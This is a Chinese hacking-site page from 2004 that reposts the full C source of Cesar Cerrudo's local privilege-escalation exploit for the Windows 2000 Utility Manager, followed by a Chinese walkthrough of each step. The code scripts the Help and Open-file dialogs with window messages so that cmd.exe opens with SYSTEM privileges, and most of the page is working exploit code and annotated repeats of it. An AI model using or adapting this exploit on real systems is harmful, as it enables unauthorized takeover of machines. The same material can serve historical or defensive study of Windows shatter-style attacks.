FLASH游戏 | 站长工具 | 技术学院 忙鱼网 怕笑网 
积木网
专题推荐:   Mysql初级教程  |   MySQL数据库技术强化学习  |   nginx负载平衡  |   搜索引擎优化(SEO)  |   Linux命令详解  |   Linux网管  |
常用手册:   MySQL4.1中文手册  |  HTML4.0参考手册  |  APACHE 2.0中文在线手册  |  MySQL 5.1参考手册  |  FreeBSD 7.0使用手册
菜鸟入门 | 病毒漏洞 | 黑客工具 | 入侵实例 | 黑客编程 | 旁门左道
推荐: PHP5中文在线手册 | Smarty中文手册(模板引擎) | css2样式表中文手册 | ASP开发手册 | JScript开发手册
积木网 >> 黑客技术 >> 病毒漏洞

W2kUtilManExp攻击程序分析

来源:互联摘选 日期:2004年07月29日 02:51:46
站长工具 友情链接查询  |    搜索引擎收录查询  |    PR查询假PR检测  |    IP地址查询  |    查询域名绑定IP
这个是源代码:
 
//by Cesar Cerrudo  sqlsec at yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
 
#include "stdio.h"
#include "windows.h"
 
 
int main(int argc, char* argv[])
{
 HWND lHandle, lHandle2;
 POINT point;
 char sText[]="%windir%\\system32\\cmd.ex?";
 
//  run utility manager
// system("utilman.exe /start");
// Sleep(500);
 
 lHandle=FindWindow(NULL, "Utility manager");   
 if (!lHandle) {
  printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then run UtilManExploit2.exe\n");
  return 0;
 }
 
 PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button in the taskbar or Alt+Space Bar
 
 Sleep(100);
 
 SendMessage(lHandle,0x365,NULL,0x1); //send WM_COMMANDHELP  0x0365  lParam must be <>NULL 
 Sleep(300);
 
 SendMessage (FindWindow(NULL, "Windows Help"), WM_IME_KEYDOWN, 
VK_RETURN, 0);
 Sleep(500);
 
 
 // find open file dialog window
 lHandle = FindWindow("#32770","Open");
 
 // get input box handle
 lHandle2 = GetDlgItem(lHandle, 0x47C);
 Sleep(500);
 
 // set text to filter listview to display only cmd.exe
 SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
 Sleep(800);
 
 // send return
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
 
 //get navigation bar handle
 lHandle2 = GetDlgItem(lHandle, 0x4A0);
 
 //send tab
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
 Sleep(500);
 lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
 //get list view handle
 lHandle2 = GetDlgItem(lHandle2, 0x1);
 
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
 Sleep(500);
 
 //popup context menu
 PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
 Sleep(1000);
 
 // get context menu handle
 point.x =10; point.y =30;
 lHandle2=WindowFromPoint(point);
 
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
 SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
 
 SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
 Sleep(500);
 SendMessage (FindWindow(NULL, "Windows Help"), WM_CLOSE, 0, 0);// close open error window
 SendMessage (FindWindow(NULL, "Utility manager"), WM_CLOSE, 0, 0);// close utility manager
 return 0;
}
本人根据以上代码编译了一个小工具, 由于不是十分完善, 暂时不发布,只将UtilMan.exe的简单分析
做了个说明:
UtilMan.exe的新漏洞简单分析
该漏洞在2k+sp4下测试成功.


大概意思是:


// By Cesar Cerrudo cesar appsecinc com


// Local elevation of priviliges exploit for Windows Utility Manager


得到一个系统权限的shell



char sText[]="%windir%\\system32\\cmd.ex?"; //不是.exe
// 运行工具管理器
//WinExec ("utilman.exe /start",SW_SHOW);


//Sleep(500);
// 打开帮助,这时执行了winhlp32.exe,4d号消息是未公开的相当于按下F1吧


SendMessage(FindWindow(NULL, "工具管理器"), 0x4D, 0, 0);


Sleep(500);
// 打开文件打开对话框,winhlp32.exe中44d为菜单栏打开选项的ID


PostMessage(FindWindow(NULL, "Windows 帮助"), WM_COMMAND, 0x44D, 0);


//一定要是postmessage
Sleep(500);



// 得到文件打开对话框句柄


lHandle = FindWindow("#32770","打开");
// 得到文件打开对话框中输入文件名编辑框的句柄,这个编辑框的ID为47c


lHandle2 = GetDlgItem(lHandle, 0x47C);


Sleep(500);
//设置文件名编辑框的值为cmd.ex?


SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);


Sleep(800);
//输入回车,这样打开对话框的文件列表中就会显示.ex?文件,否则显示的


//是.hlp文件,因为默认只能打开后缀是.hlp的文件.


SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
//得到打开对话框左边的工具栏(就是历史,桌面,我的文档大图标)的句柄


//ToolbarWindow32这个控件类名为


lHandle2 = GetDlgItem(lHandle, 0x4A0);


//发送tab消息,这样焦点就在右边的文件列表控件中了.


SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);



Sleep(500);
//得到打开对话框的子控件文件列表控件的句柄


lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);


//得到列表控件的子控件syslistview32的句柄,控件id为1


lHandle2 = GetDlgItem(lHandle2, 0x1);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char


SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char


SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
//发送cmd这样是为了把焦点准确的落在cmd.exe上


//奇怪的是手工一个一个的输入cmd则不行哟
Sleep(800);
// 打开右键菜单


PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);


Sleep(1000);
//通过当前的光标位置来得到右键菜单句柄


point.x =10; point.y =30;


lHandle2=WindowFromPoint(point);
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // 在右键菜单中下移一个选项


SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // 在右键菜单中下移一个选项这时落在打开上


SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // 发送回车
SendMessage (lHandle, WM_CLOSE,0,0); //关闭文件打开对话框
return(0);


}
在单机运行此程序,以上的操作是隐藏性的,过程只有几秒钟时间
至于它的利用条件~在进一步的参考中........

被阅读 0 次 本文现有评论 0
打印】 【收藏此页】 【关闭

强烈推荐

热门知识

最新文章

合作伙伴:网乐宽频 | 北京画廊
站长 服务邮箱:GimooHr(#)Gmail.Com 站长交流群:6412338 联系站长QQ号:36147437
Copyright © 2008 Gimoo.NetInc. all rights reserved 京ICP备05050695号